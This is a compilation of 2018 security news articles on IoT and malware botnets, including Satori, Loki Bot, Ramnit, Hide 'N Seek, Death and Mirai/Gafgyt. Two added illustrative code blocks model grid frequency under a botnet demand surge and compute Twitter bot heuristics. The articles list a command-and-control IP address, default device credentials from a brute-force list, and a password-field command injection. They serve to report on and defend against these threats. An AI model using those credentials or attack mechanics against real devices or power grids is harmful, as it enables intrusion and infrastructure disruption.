Mirai, Mirai and again Mirai: since the source code was leaked online, gangs of teenagers have found a new playground. Built on a (solid) software infrastructure, Mirai is still able to work well and to be lethal, also because the effort to update it is not titanic and the skills of the hacker can be modest. In other words, infecting the planet nowadays is (still) very easy and the attack pattern seems clear: download the Mirai source code, change the exploits, and everything works fine. But this time the story did not have a happy ending.

The news comes from the legendary Kevin Poulsen who has posted the news on the Daily Beast reporting that “a 20-year-old Washington man was indicted last week on federal computer hacking charges after rival hackers fingered him as the creator of a notorious botnet tearing through routers around the world.”

“last December, researchers at the Check Point cybersecurity firm traced Satori to an amateur known as “Nexus Zeta” who frequented a web forum for untrained and wannabe malicious hackers. Two months later, a little-noticed Pastebin post by rival hackers purported to reveal Nexus Zeta’s real identity, naming the same Kenneth Schuchman indicted last week.” wrote Poulsen.

Kenneth Schuchman, who “lives in Vancouver, Washington with his father”, has now been indicted. The indictment doesn’t name the malware, but “all signs point to the virulent Satori botnet that surfaced last fall, and has infected at least 500,000 internet routers around the world”, added Kevin Poulsen.

The activity of the Satori botnet was observed by Check Point at the end of 2017; below are the findings included in a report published by the firm.

“A Zero-Day vulnerability (CVE-2017-17215) in the Huawei home router HG532 has been discovered by Check Point Researchers, and hundreds of thousands of attempts to exploit it have already been found in the wild.
The delivered payload has been identified as OKIRU/SATORI, an updated variant of Mirai.
The suspected threat actor behind the attack has been identified by his nickname, ‘Nexus Zeta’.” states the report published by Check Point security

The strange thing about these wannabe hackers is that their emotional background plays a crucial role in the investigation: as Mr. Poulsen reports, Kenneth Schuchman wrote on Facebook in 2015 regarding Pokemon Go: “I do black hat hacking all the time and I haven’t even downloaded this game let alone played it.” From “black hat hacking all the time” to jail is a short step.

I asked Odisseus, an Italian member of the MalwareMustDie team, for a quick comment. MalwareMustDie members have fought malware for a long time, and the group was the first in the world to discover and analyze Mirai, in late August 2016, thanks to the excellent reverse engineering skills of their head @unixfreaxjp.

“It’s been two years since Mirai has been discovered and it’s still able to infect thousands of routers around the world: but this news appears like a symbolic anniversary. It is very important to give space to this kind of news because every teenager or young man needs to know that playing with malware is the fastest way to finish in jail”.


Loki Bot: On a hunt for corporate passwords

31.8.2018 Kaspersky  BotNet

Starting from early July, we have seen malicious spam activity that has targeted corporate mailboxes. The messages discovered so far contain an attachment with an .iso extension that Kaspersky Lab solutions detect as Loki Bot. The malware’s key objective is to steal passwords from browsers, messaging applications, mail and FTP clients, and cryptocurrency wallets. Loki Bot dispatches all its loot to the malware owners.

ISO images are copies of optical discs that can be mounted in a virtual CD/DVD drive to be used in the same way as the originals. Whereas in days of yore users needed dedicated software to open this type of image, today’s operating systems support the format out of the box, and if you want to access the contents of the file, all you need to do is double-click. Malicious spam uses this type of file as a container for delivering malware, albeit rarely.

As mentioned above, hackers were sending out copies of Loki Bot to company email addresses that could be obtained from public sources or from the companies’ own websites.

The emailed messages were notably diverse:

Fake notifications from well-known companies

Imitating messages from well-known corporations is one of the most popular tricks in the hackers’ arsenal. Interestingly enough, fake emails used to be directed mostly at common users and customers, whereas now companies are increasingly the target.

Fake notifications containing financial documents

The scammers passed off malicious files as financial documents: invoices, transfers, payments, etc. This is a fairly popular malicious spamming technique, with the message body usually no more than a few lines and the subject mentioning what exactly is purported to be attached.

Fake orders or offers

Phishers may pose as customers placing an order, or a vendor offering their goods or services.

Every year we observe an increase in spam attacks on the corporate sector. The perpetrators have used phishing and malicious spam, including forged business emails, in their pursuit of confidential corporate information: intellectual property, authentication data, databases, bank accounts, etc. That’s why today it’s essential for corporate security measures to include both technical protection and training for employees, because their actions may cause irreparable damage to the business.


Loki Bot Attacks Target Corporate Mailboxes
30.8.2018 securityweek BotNet

Loki Bot’s operators have been targeting corporate mailboxes with their spam messages, Kaspersky Lab reports.

The emails employ various lures to trick potential victims into opening malicious attachments that would deploy the Loki Bot stealer onto the target machines. The messages masquerade as notifications from other companies, or as orders and offers.

As part of the campaign, cybercriminals have been targeting corporate mailboxes that can be obtained from public sources or which are listed on the targeted companies’ websites, Kaspersky discovered.

The spam messages would attempt to deliver the malicious payload via an attached ISO file. The extension is associated with copies of optical discs that can be mounted to access their content. Modern operating systems can mount ISO files directly, but dedicated software that can handle the extension also exists.

ISO files represent complete images of optical discs, and cybercriminals are now abusing them as containers for delivering their malicious applications, it seems. Such occurrences, however, are rare, Kaspersky says.

As part of the recent campaign, the ISO files contained the Loki Bot malware, an information-stealing Trojan designed to harvest usernames and passwords from the victim machines, along with other user data.

“The malware’s key objective is to steal passwords from browsers, messaging applications, mail and FTP clients, and cryptocurrency wallets. Loki Bot dispatches all its loot to the malware owners,” Kaspersky notes.

The new campaign proves yet again that the security measures organizations take should also include training for employees, in addition to technical protection. Employees’ actions can cause irreparable damage to a business, the security firm notes.

“Every year we observe an increase in spam attacks on the corporate sector. The perpetrators have used phishing and malicious spam, including forged business emails, in their pursuit of confidential corporate information: intellectual property, authentication data, databases, bank accounts, etc,” Kaspersky concludes.


Botnet of Smart Heaters, ACs Can Cause Power Disruptions: Researchers

16.8.2018 securityweek BotNet

BlackIoT attack can lead to power grid disruptions

A research paper published this week at the 27th USENIX Security Symposium describes a new type of attack that could cause energy grid disruptions. The method involves a botnet powered by tens of thousands of compromised high-wattage IoT devices such as heaters and air conditioners.

Wi-Fi enabled air conditioners, ovens, water heaters and space heaters that can be controlled remotely over the Internet are increasingly popular. The power usage of these devices ranges between 1,000 and 5,000 watts.

Researchers from the Department of Electrical Engineering at Princeton University claim that these types of high-wattage IoT devices can be exploited in what they call “Manipulation of demand via IoT” (MadIoT) attacks to cause local power outages and even large-scale blackouts.

In a MadIoT attack, a threat actor takes control of smart high-wattage devices in order to manipulate (i.e. increase or decrease) power consumption.


The experts tested their theory using state-of-the-art simulators of real-world power grid models.

One attack scenario involves frequency instability. The researchers noted that the normal operation of a power grid relies on the balance between supply and demand. They believe that this balance can be disrupted using an IoT botnet of air conditioners and heaters that are simultaneously switched on or off by the attacker.

“If the resulting sudden increase in the demand is greater than a threshold, which depends on the inertia of the system, it can cause the system’s frequency to drop significantly before the primary controllers can react,” the researchers wrote in their paper. “This consequently may result in the activation of the generators’ protective relays and loss of generators, and finally a blackout. Sudden decrease in the demand may also result in the same effect but this time by causing a sudden rise in the frequency.”

Using a simulator based on the power grid model of the Western Electricity Coordinating Council (WECC), which is responsible for compliance monitoring and enforcement in the Western part of the United States and Canada, researchers calculated that a 30 percent increase in power demand would lead to all generators tripping.

In order to launch such an attack, experts determined that an attacker would need a botnet of 90,000 air conditioners and 18,000 electric water heaters within the targeted geographical area.
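To make the frequency argument above concrete, here is an added illustration (not code from the paper or the article): a single-machine swing-equation model with a first-order governor, integrated for a sudden demand step. All parameters (inertia H, droop R, damping D, governor lag T_g, the relay setting f_trip and the device census in the helper) are constructed round values, not the WECC model the researchers used.

```python
"""Frequency response of a grid to a sudden demand step (constructed model).

Shows the reasoning quoted above: a step increase in demand pulls the
frequency down at a rate fixed by the system inertia H until primary
control (governors) catches up.  A low-inertia system, or a large step,
gives a deeper dip before the governors react.
"""


def simulate_demand_step(delta_p, H, R=0.05, D=1.0, T_g=0.5, f0=60.0,
                         dt=0.001, t_end=20.0):
    """Integrate the swing equation with a lagged governor (Euler steps).

    delta_p : sudden demand increase, per unit of system base (0.30 = +30 %)
    H       : system inertia constant in seconds (larger = more inertia)
    R       : governor droop (pu), D : load damping (pu), T_g : governor lag (s)
    Returns (frequency nadir in Hz, time of the nadir in seconds).
    """
    w = 0.0     # per-unit speed (frequency) deviation
    pm = 0.0    # extra mechanical power supplied by governors (pu)
    nadir, t_nadir, t = f0, 0.0, 0.0
    for _ in range(int(t_end / dt)):
        # 2H * dw/dt = P_mech - P_elec - D*w, with P_elec stepped by delta_p
        dw = (pm - delta_p - D * w) / (2.0 * H)
        # Governor raises mechanical power against the frequency error,
        # but only with a time constant T_g (the "before they can react").
        dpm = (-pm - w / R) / T_g
        w += dw * dt
        pm += dpm * dt
        t += dt
        f = f0 * (1.0 + w)
        if f < nadir:
            nadir, t_nadir = f, t
    return nadir, t_nadir


def generators_trip(delta_p, H, f_trip, **kw):
    """True if the nadir falls below an under-frequency relay setting f_trip."""
    nadir, _ = simulate_demand_step(delta_p, H, **kw)
    return nadir < f_trip


def demand_step_fraction(devices, system_load_mw):
    """Demand step (per unit) for a botnet census {name: (count, watts)}.

    Constructed helper linking a device count to delta_p; the real figure
    depends on the grid model's total load, which the article does not give.
    """
    extra_mw = sum(count * watts for count, watts in devices.values()) / 1e6
    return extra_mw / system_load_mw


if __name__ == "__main__":
    for dp in (0.01, 0.30):
        for H in (2.0, 5.0):
            nadir, t_n = simulate_demand_step(dp, H)
            print(f"step {dp:>4.0%}  H={H:.0f}s  nadir {nadir:6.2f} Hz at {t_n:4.2f}s")
```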


A botnet of roughly 100,000 IoT systems may not seem like an impossible task considering that the Mirai botnet, at its peak, infected over 600,000 devices. However, those devices were distributed across more than 160 countries and they included low-wattage devices such as cameras. In the case of a MadIoT botnet, the bots would need to be concentrated in the region of the targeted power grid and they would need to be high-wattage devices for the attack to have an impact.

If the attack leads to a blackout, the grid operator will need to perform what is known as a black start in order to get the power back on. During this process, power is restored in one area at a time to avoid frequency instability. The attacker can use the botnet to suddenly increase demand once power is restored in one area, which can cause the grid to shut down once again.

Another type of attack, which can also lead to a widespread blackout, involves line failures that lead to further line failures in what is known as a cascading failure. Tests for this type of attack were conducted using a simulation of the power grid in Poland, which researchers say is one of the largest and most detailed publicly available real-world power grids.

Calculations showed that an increase of one percent in the demand in Poland’s grid during the summer of 2008 would result in a cascading failure with 263 line failures and an 86 percent load outage. Such an attack would require a botnet of 210,000 compromised air conditioners.

Researchers noted that even if the botnet does not cause frequency instability or line failures, simultaneously turning on tens of thousands of devices within a region can significantly increase costs for the grid operator. These types of attacks could be launched by utilities that operate reserve generators, which provide grid operators electric power – at a higher-than-normal cost – if the demand is higher than estimated, experts said.

“The MadIoT attacks’ sources are hard to detect and disconnect by the grid operator due to their distributed nature. These attacks can be easily repeated until being effective and are black-box since the attacker does not need to know the operational details of the power grid. These properties make countering the MadIoT attacks challenging,” they wrote in their paper.

The same team of Princeton researchers has published a separate paper focusing on how the power grid can be protected against IoT botnets of high wattage devices.

Experts and government authorities have often warned that there is an increasing risk of cyber attacks aimed at the energy sector. However, most warnings involve scenarios in which actors target energy organizations directly.

Earlier this year, researchers warned that threat actors may be able to cause blackouts by remotely manipulating residential or commercial AC units via RF signals to create a surge. However, other experts argued that such attacks would not be easy to carry out in the real world – at least in the United States – due to how power distribution works.


Piping botnet: Researchers warns of possible cyberattacks against urban water services
16.8.2018 securityaffairs BotNet

Piping botnet – Israeli researchers warn of a potential distributed attack against urban water services that uses a botnet of smart irrigation systems that water simultaneously.
Ben-Gurion University of the Negev (BGU) cyber security researchers warn of a potential distributed attack against urban water services that uses a botnet of smart irrigation systems that water simultaneously. A botnet is a large network of computers or devices controlled by a command and control server without the owner’s knowledge.

Ben Nassi, a researcher at Cyber@BGU, will be presenting “Attacking Smart Irrigation Systems” in Las Vegas at the prestigious Def Con 26 Conference in the IoT Village on August 11.

The researchers analyzed and found vulnerabilities in a number of commercial smart irrigation systems, which enable attackers to remotely turn watering systems on and off at will. The researchers tested three of the most widely sold smart irrigation systems: GreenIQ, BlueSpray, and RainMachine smart irrigation systems. Watch the video.

“By simultaneously applying a distributed attack that exploits such vulnerabilities, a botnet of 1,355 smart irrigation systems can empty an urban water tower in an hour and a botnet of 23,866 smart irrigation systems can empty good water reservoir overnight,” Nassi says. “We have notified the companies to alert them of the security gaps so they can upgrade their smart system’s irrigation system’s firmware.”

Water production and delivery systems are part of a nation’s critical infrastructure and generally, are secured to prevent attackers from infecting their systems. “However, municipalities and local government entities have adopted new green technology using IoT smart irrigation systems to replace traditional sprinkler systems, and they don’t have the same critical infrastructure security standards.”

In the study, the researchers present a new attack against urban water services that doesn’t require infecting its physical cyber systems. Instead, the attack can be applied using a botnet of smart irrigation regulation systems at urban water services that are much easier to attack.


The researchers demonstrated how a bot running on a compromised device can (1) detect a smart irrigation system connected to its LAN in less than 15 minutes, and (2) turn on watering via each smart irrigation system using a set of session hijacking and replay attacks.

Further technical details on the Piping botnet are included in the article published by the experts, titled “Piping Botnet – Turning Green Technology into a Water Disaster”

“Although the current generation of IoT devices is being used to regulate water and electricity obtained from critical infrastructures, such as the smart-grid and urban water services, they contain serious security vulnerabilities and will soon become primary targets for attackers,” says Nassi, who is also Ph.D. student of Prof. Yuval Elovici’s in BGU’s Department of Software and Information Systems Engineering and a researcher at the BGU Cyber Security Research Center. Elovici is the Center’s director as well as the director of Telekom Innovation Labs at BGU.

The research team also included Ph.D. student Yair Meidan supervised by Dr. Asaf Shabtai, as well as two interns, Moshe Sror and Ido Lavi.


About the Author: American Associates, Ben-Gurion University of the Negev



Ramnit is back and contributes in creating a massive proxy botnet, tracked as ‘Black’ botnet
8.8.2018 securityaffairs   BotNet

Security researchers at Checkpoint security have spotted a massive proxy botnet, tracked as ‘Black’ botnet, created by Ramnit operators.
Security researchers at Checkpoint security have spotted a massive proxy botnet, tracked as ‘Black’ botnet, that could be the sign of a wider ongoing operation involving the Ramnit operators.

Ramnit is one of the most popular banking malware families in existence today. It was first spotted in 2010 as a worm; in 2011 its authors improved it, starting from the leaked Zeus source code, turning the malware into a banking Trojan. In 2014 it reached the pinnacle of its success, becoming the fourth largest botnet in the world.

In 2015, Europol partnering with several private technology firms announced the takedown of the Ramnit C2 infrastructure.

A few months later Ramnit was back, the researchers at IBM security discovered a new variant of the popular Ramnit Trojan.

Recently the experts observed that the “Black” botnet campaign has infected up to 100,000 systems in two months, and this is just the tip of the iceberg because, according to the researchers, a second-stage malware called Ngioweb is already spreading.

There is a concrete risk that the Ramnit operators are using the two malware families to build a large, multi-purpose proxy botnet that could be used for many fraudulent activities (e.g. DDoS attacks, ransomware campaigns, cryptocurrency mining campaigns).

“Recently we discovered the Ramnit C&C server (185.44.75.109) which is not related to the previously most prevalent botnet “demetra”. According to domain names which are resolved to the IP address of this C&C server, it pretends to control even old bots, first seen back in 2015. We named this botnet “Black” due to the RC4 key value, “black”, that is used for traffic encryption in this botnet.” reads the analysis published by Checkpoint security.

“This C&C server has actually been active since 6th March 2018 but didn’t attract attention because of the low capacity of the “black” botnet at that time. However, in May-July 2018 we detected a new Ramnit campaign with around 100,000 computers infected.”

According to the experts, in the Black operation, the Ramnit malware is distributed via spam campaigns. The malicious code works as a first-stage malware and it is used to deliver a second-stage malware dubbed Ngioweb.

“Ngioweb represents a multifunctional proxy server which uses its own binary protocol with two layers of encryption,” continues the analysis published by Checkpoint.

“The proxy malware supports back-connect mode, relay mode, IPv4, IPv6 protocols, TCP and UDP transports, with first samples seen in the second half of 2017.”

Ngioweb relies on a two-stage C&C infrastructure: the STAGE-0 C&C server tells the malware the address of the STAGE-1 C&C server over an unencrypted HTTP connection; the STAGE-1 C&C server then controls the malware over an encrypted connection.


The Ngioweb malware can operate in two main modes, the Regular back-connect proxy, and the Relay proxy mode.

In a relay proxy mode, the malware allows operators to build chains of proxies and hide their services behind the IP address of a bot.

“The following sequence of actions is used for building a hidden service using the Ngioweb botnet:

Ngioweb Bot-A connects to C&C STAGE-0 and receives command to connect to the server C&C STAGE-1 with address X:6666.
Ngioweb Bot-A connects to C&C STAGE-1 (Server-X) at X:6666. Server-X asks the bot to start the TCP server. Ngioweb bot reports on starting TCP server with IP address and port.
Malware actor publishes the address of the Bot-A in DNS (or using any other public channel).
Another malware Bot-B resolves the address of Bot-A using DNS (or using any other public channel).
Bot-B connects to Bot-A.
Bot-A creates new connection to Server-X and works as relay between Server-X and Bot-B.

Further details, including the IoC, are reported in the analysis published by Checkpoint.


Duo Security created open tools and techniques to identify large Twitter botnet

7.8.2018 securityaffairs BotNet

Researchers at security firm Duo Security have created a set of open source tools and disclosed techniques that could be used to identify large Twitter botnet.
Security experts from Duo Security have developed a collection of open source tools and disclosed techniques that can be useful in identifying large Twitter botnet.

The experts developed the tools starting from the analysis of 88 million Twitter accounts and over half-a-billion tweets, one of the largest random datasets of Twitter accounts analyzed to date.

“This paper details the techniques and tools we created to both build a large dataset containing millions of public Twitter profiles and content, as well as to analyze the dataset looking for automated accounts.” reads the research paper published by Duo Security.

“By applying a methodical data science approach to analyzing our dataset, we were able to build a classifier that effectively finds bots at a large scale.”

The dataset was built using Twitter’s API; the collected records include profile name, tweet and follower count, avatar, bio, the content of tweets, and social network connections.

Practical data science techniques can be used to create a classifier that could help researchers in finding automated Twitter accounts.

The experts defined 20 unique account heuristics to discover the bots. They include the number of digits in a screen name, the entropy of the screen name, the followers/following ratio, the number of tweets and likes relative to the account’s age, the number of users mentioned in a tweet, the number of tweets with the same content, the percentage of tweets with URLs, the time between tweets, the average hours tweeted per day, and the average “distance” of account age in retweets/replies.

The above heuristics are organized into three categories: “Account attributes,” “Content,” and “Content Metadata.”

The tools and techniques devised by the researchers could be very useful in investigating fraudulent activities associated with Twitter botnets. The experts first identify the automated bots, then use the tools to monitor the evolution of the botnets they belong to.

The experts shared a case study related to the discovery of a sophisticated botnet of at least 15,000 bots involved in a cryptocurrency scam. The analysis of the botnet and the monitoring of the malicious infrastructure over time allowed the experts to discover how bots evolve to evade detection.

The experts reported their findings to Twitter, which confirmed it is aware of the problem and is currently working on implementing new security measures to detect problematic accounts.


“Twitter is aware of this form of manipulation and is proactively implementing a number of detections to prevent these types of accounts from engaging with others in a deceptive manner. Spam and certain forms of automation are against Twitter’s rules. In many cases, spammy content is hidden on Twitter on the basis of automated detections.” replied Twitter.

“When spammy content is hidden on Twitter from areas like search and conversations, that may not affect its availability via the API. This means certain types of spam may be visible via Twitter’s API even if it is not visible on Twitter itself. Less than 5% of Twitter accounts are spam-related.”

Duo Security will release its tools as open source on August 8 during the Black Hat conference in Las Vegas.

“Malicious bot detection and prevention is a cat-and-mouse game,” concluded Duo Principal R&D Engineer Jordan Wright. “We anticipate that enlisting the help of the research community will enable discovery of new and improving techniques for tracking bots. However, this is a more complex problem than many realize, and as our paper shows, there is still work to be done.”


New Open Source Tools Help Find Large Twitter Botnets
6.8.2018 securityweek  BotNet

Duo Security has created open source tools and disclosed techniques that can be useful in identifying automated Twitter accounts, which are often used for malicious purposes.

The trusted access solutions provider, which Cisco recently agreed to acquire for $2.35 billion, has collected and studied 88 million Twitter accounts and over half-a-billion tweets. Based on this data, which the company says is one of the largest random datasets of Twitter accounts analyzed to date, researchers were able to create algorithms for differentiating humans from bots.

The dataset, collected using Twitter’s API, includes profile name, tweet and follower count, avatar, bio, content of tweets, and social network connections.

Researchers created their tools and techniques for identifying bots based on 20 unique account characteristics, including the number of digits in a screen name, followers/following ratio, number of tweets and likes relative to the account’s age, number of users mentioned in a tweet, number of tweets with the same content, percentage of tweets with URLs, time between tweets, and average hours tweeted per day.
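The heuristics listed in this article and in the securityaffairs piece above (digits and entropy of the screen name, follower ratio, activity relative to account age, duplicate content, URL share, inter-tweet timing, hours active per day) can be computed from collected profile data. The following is an added example, not Duo Security's tooling: a feature extractor over constructed sample accounts, plus a hand-picked rule set for triage that stands in for the trained classifier the paper describes.

```python
import math
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

URL_RE = re.compile(r"https?://\S+")


def screen_name_entropy(name):
    """Shannon entropy in bits per character; random-looking handles score high."""
    n = len(name)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(name).values())


def account_features(profile, tweets, now):
    """Heuristics in the articles' three groups: account attributes, content,
    content metadata.  profile: dict(screen_name, followers, following, likes,
    created_at); tweets: list of (datetime, text)."""
    name = profile["screen_name"]
    age_days = max((now - profile["created_at"]).total_seconds() / 86400.0, 1.0)
    texts = [text for _, text in tweets]
    times = sorted(ts for ts, _ in tweets)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    hours_by_day = defaultdict(set)          # distinct hours tweeted, per day
    for ts in times:
        hours_by_day[ts.date()].add(ts.hour)
    dup = Counter(texts)
    n = len(texts) or 1                      # avoid division by zero
    return {
        # account attributes
        "digits_in_name": sum(ch.isdigit() for ch in name),
        "name_entropy": screen_name_entropy(name),
        "follow_ratio": profile["followers"] / max(profile["following"], 1),
        "tweets_per_day": len(texts) / age_days,
        "likes_per_day": profile["likes"] / age_days,
        # content
        "avg_mentions": sum(t.count("@") for t in texts) / n,
        "dup_content_share": sum(c for c in dup.values() if c > 1) / n,
        "url_share": sum(1 for t in texts if URL_RE.search(t)) / n,
        # content metadata
        "mean_gap_s": (sum(gaps) / len(gaps)) if gaps else None,
        "avg_hours_per_day": (sum(len(h) for h in hours_by_day.values())
                              / len(hours_by_day)) if hours_by_day else 0.0,
    }


# Constructed demo thresholds for rule-of-thumb triage; the paper trained a
# classifier on features like these instead of hand-picking cut-offs.
RULES = {
    "digits_in_name": lambda v: v >= 4,
    "follow_ratio": lambda v: v < 0.05,
    "dup_content_share": lambda v: v >= 0.5,
    "url_share": lambda v: v >= 0.8,
    "mean_gap_s": lambda v: v is not None and v < 600,
    "tweets_per_day": lambda v: v > 50,
}


def flag_reasons(feats):
    """Names of the heuristics whose demo threshold the account crosses."""
    return [key for key, test in RULES.items() if test(feats[key])]


def make_sample_accounts(now):
    """Constructed sample data: a giveaway-scam style bot and an ordinary user."""
    scam = "Giveaway! Send 0.1 coin, get 1 back: https://example.invalid/claim @news"
    bot = {"screen_name": "Crypto_Give4way87231", "followers": 12,
           "following": 2000, "likes": 0, "created_at": now - timedelta(days=5)}
    bot_tweets = [(now - timedelta(minutes=3 * i), scam) for i in range(20)]
    human = {"screen_name": "jane_doe", "followers": 420, "following": 380,
             "likes": 3100, "created_at": now - timedelta(days=2000)}
    human_tweets = [(now - timedelta(days=d, hours=h), f"Day {d}: note {h} on the weather")
                    for d, h in ((1, 3), (2, 9), (4, 14), (7, 20), (11, 8))]
    return (bot, bot_tweets), (human, human_tweets)


if __name__ == "__main__":
    now = datetime(2018, 8, 6, 12, 0, 0)
    for profile, tweets in make_sample_accounts(now):
        feats = account_features(profile, tweets, now)
        print(profile["screen_name"], flag_reasons(feats))
```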

Tests conducted by experts led to the discovery of a sophisticated cryptocurrency-related scam botnet powered by at least 15,000 bots. These accounts were designed to use deceptive behaviors to avoid automatic detection, while attempting to obtain money from users by spoofing cryptocurrency exchanges, celebrities and news organizations.

Duo Security informed Twitter of its findings. The social media giant says it’s aware of the problem and claims it’s proactively implementing mechanisms to detect problematic accounts.

“Spam and certain forms of automation are against Twitter's rules. In many cases, spammy content is hidden on Twitter on the basis of automated detections. When spammy content is hidden on Twitter from areas like search and conversations, that may not affect its availability via the API. This means certain types of spam may be visible via Twitter's API even if it is not visible on Twitter itself. Less than 5% of Twitter accounts are spam-related,” Twitter said.

Duo Security has published a 46-page research paper describing its findings and techniques. The company will release its tools as open source on August 8 at the Black Hat conference in Las Vegas.

“Malicious bot detection and prevention is a cat-and-mouse game,” explained Duo Principal R&D Engineer Jordan Wright. “We anticipate that enlisting the help of the research community will enable discovery of new and improving techniques for tracking bots. However, this is a more complex problem than many realize, and as our paper shows, there is still work to be done.”


Hide ‘N Seek Botnet Targets Smart Homes
26.7.2018 securityweek BotNet

The infamous Hide ‘N Seek botnet is now targeting vulnerabilities in home automation solutions, network security firm Fortinet says.

First observed in January this year, the botnet originally targeted home routers and IP cameras, and had a decentralized, peer-to-peer architecture. By May, the malware had infected over 90,000 unique devices and was targeting far more device types and architectures.

Earlier this month, Qihoo 360's NetLab researchers revealed that the malware also included exploits for AVTECH webcams and Cisco Linksys routers, along with support for OrientDB and CouchDB database servers.

Fortinet now reports that the latest version of the malware has a configuration made up of 110 entries and 9 exploits. More importantly, Fortinet's security researchers reveal, Hide ‘N Seek has added an exploit for a HomeMatic Zentrale CCU2 remote code execution vulnerability.

The malware implemented the exploit less than a week after it became public, and the same happened with the exploit for the Apache CouchDB remote code execution flaw, Fortinet reveals. The malware also targets a remote code execution vulnerability in Belkin NetCam devices.

HomeMatic is a provider of Smart Home devices from the German manufacturer eQ-3. The botnet is targeting the system’s central element, which provides control, monitoring, and configuration options for all HomeMatic devices. This may be the moment when malware starts hacking your house.

“[Hide ‘N Seek] has been aggressively adding exploits and targeting more platforms and devices to increase its propagation scope. Utilizing freshly released PoC exploits to its arsenal increases the chance for it to be the first to infect these vulnerable devices,” Fortinet notes.

The security researchers also say they expect the threat to add more functions in future iterations, as well as to expand usage of publicly available exploits.


The Death botnet grows, targeting AVTech devices with a 2-year-old exploit
25.7.2018 securityaffairs BotNet

A new botnet, tracked as Death botnet has appeared in the threat landscape and is gathering unpatched AVTech devices with an old exploit.
A new botnet, tracked as ‘Death botnet,’ has appeared in the threat landscape, its author that goes online with the moniker EliteLands is gathering unpatched AVTech devices in the malicious infrastructure.

AVTech is one of the world’s leading CCTV manufacturers, it is the largest public-listed company in the Taiwan surveillance industry.

EliteLands is using a 2-year-old exploit that can trigger numerous well-known vulnerabilities in the AVTech firmware. Many of the vendor’s products currently run the vulnerable firmware, including DVRs, NVRs, and IP cameras.

The security expert Ankit Anubhav who discovered the Death botnet revealed that outdated firmware versions expose the passwords of the AVTech device in cleartext. The flaw could be exploited by an unauthenticated attacker to add users to existing devices.

Ankit Anubhav told Bleeping Computer that EliteLands is exploiting the issues to add new users to AVTech devices.

The expert explained that older firmware is vulnerable to a command injection vulnerability for the password field, this means that the attacker can provide a shell command in this field to get it executed and take over the devices.

“So, if I put reboot as password, the AVTech system gets rebooted,” Anubhav explained. “Of course, the Death botnet is doing much more than just rebooting.”

AVTech rolled out security updates for the flaw at the beginning of 2017, but evidently many devices are still running old firmware. Recently, another botnet, the Hide ‘N Seek (HNS) botnet, started leveraging the same issue ((new) AVTECH RCE) to target IoT devices.

At the end of June, AVTech published a security alert regarding the attacks exploiting the above flaw.

Anubhav confirmed that EliteLands is gathering devices for his Death botnet by targeting exposed devices with different payloads for the password field.

The latest payload used by EliteLands adds accounts with a lifespan of five minutes that execute his payload and are then deleted from the device.

“This is like a burner account,” Anubhav told Bleeping Computer. “Usually people don’t make new user accounts with access of only 5 minutes.”

Anubhav has already identified over 1,200 AVTech devices that are potentially at risk.

Anubhav contacted EliteLands, who confirmed that he plans to use the Death botnet in massive attacks.

“The Death botnet has not attacked anything major yet but I know it will,” EliteLands said. “The Death botnet purpose was originally just to ddos but I have a greater plan on it soon. I don't really use it for attacks only to get customers aware of the power it has.”


Experts warn of new campaigns leveraging Mirai and Gafgyt variants
24.7.2018 securityaffairs BotNet

Security experts are warning of an intensification of attacks powered by two notorious IoT botnets, Mirai and Gafgyt.
Security experts are warning of a new wave of attacks powered by two botnets, Mirai and Gafgyt.

Since the code of the infamous Mirai botnet was leaked online, many variants have emerged in the threat landscape. Satori, Masuta, Wicked Mirai, JenX, Omni, and the OMG botnet are just the latest variants to appear online in 2018.

The Gafgyt botnet, also known as Bashlite and Lizkebab, first appeared in the wild in 2014 and had its source code leaked in early 2015.

In September 2016, joint research conducted by Level 3 Communications and Flashpoint identified a million devices infected by the BASHLITE malware.

“The end of May 2018 has marked the emergence of three malware campaigns built on publicly available source code for the Mirai and Gafgyt malware families that incorporate multiple known exploits affecting Internet of Things (IoT) devices.” reads the analysis published by Palo Alto Networks.

“Samples belonging to these campaigns incorporate as many as eleven exploits within a single sample, beating the IoT Reaper malware, which borrowed some of the Mirai source code but also came with an integrated LUA environment that incorporated nine exploits in its code.”

The latest variants of both bots include the code to target the D-Link DSL-2750B OS Command Injection flaw, experts noticed that the new feature was implemented only a few weeks after the publication of the Metasploit module for its exploitation on May 25.

According to the experts, the two attacks appear to be linked.

The first campaign spotted by the experts is associated with the Omni bot, one of the latest variants of the Mirai malware. The Omni bot includes a broad range of exploits, such as the code to trigger two vulnerabilities (CVE-2018-10561 and CVE-2018-1562) in Dasan GPON routers, a flaw in Huawei routers tracked as CVE-2017-17215, two command execution issues in D-Link devices, vulnerabilities in Vacron NVR devices, a remote code execution in CCTVs and DVRs from over 70 vendors, and a JAWS Webserver command execution flaw.

“All of these vulnerabilities are publicly known and have been exploited by different botnets either separately or in combination with others in the past, however, this is the first Mirai variant using all eleven of them together.” continues the report published by Palo Alto Networks.

The campaign leverages two different encryption schemes; the bot propagates only via exploits and prevents further infection of compromised devices by dropping packets received on certain ports using iptables.

The latest variant of Mirai uses the IP 213[.]183.53.120 both for serving payloads and as a Command and Control (C2) server; the same address was also used by some Gafgyt samples.

A second campaign observed by the researchers used the same exploits as the previous one, but also attempted credential brute-force attacks.

The campaign was tracked as Okane, after the name of the binaries downloaded by the shell script it uses to replicate itself.

“Unlike the previous campaign, these samples also perform a credential brute force attack.” continues the analysis.

“Some unusual entries were discovered on the brute force lists in these samples, such as the following:

root/t0talc0ntr0l4! – default credentials for Control4 devices
admin/adc123 – default credentials for ADC FlexWave Prism devices
mg3500/merlin – default credentials for Camtron IP cameras
Some samples belonging to this campaign include the addition of two new DDoS methods to the Mirai source code.”


Experts at Palo Alto Networks observed a third campaign, tracked as Hakai, that was attempting to infect devices with the Gafgyt malware using all of the exploit code seen in the previous campaigns, except for the UPnP SOAP TelnetD Command Execution exploit.

Further details about the campaigns, including IoCs, are included in the post published by Palo Alto Networks.


Botnet Targets Open Ports on Android Devices
23.7.2018 securityweek BotNet

A wave of attacks is targeting Android devices with port 5555 open, likely in an attempt to ensnare them into a botnet, Trend Micro warns.

TCP port 5555 is designed to allow management of devices via Android Debug Bridge (ADB), an Android SDK feature that allows developers to easily communicate with devices and to run commands on them or fully control them.

The ADB port is meant to be disabled on commercial devices and to require initial USB connectivity to be enabled. Last month, however, security researcher Kevin Beaumont revealed that many devices ship with ADB enabled, which leaves them exposed to attacks.

Scanning attacks specifically targeting the ADB port have been seen since January. In early 2018, a worm leveraging a modified version of Mirai’s code was searching for devices with open port 5555 to spread for crypto-mining purposes.

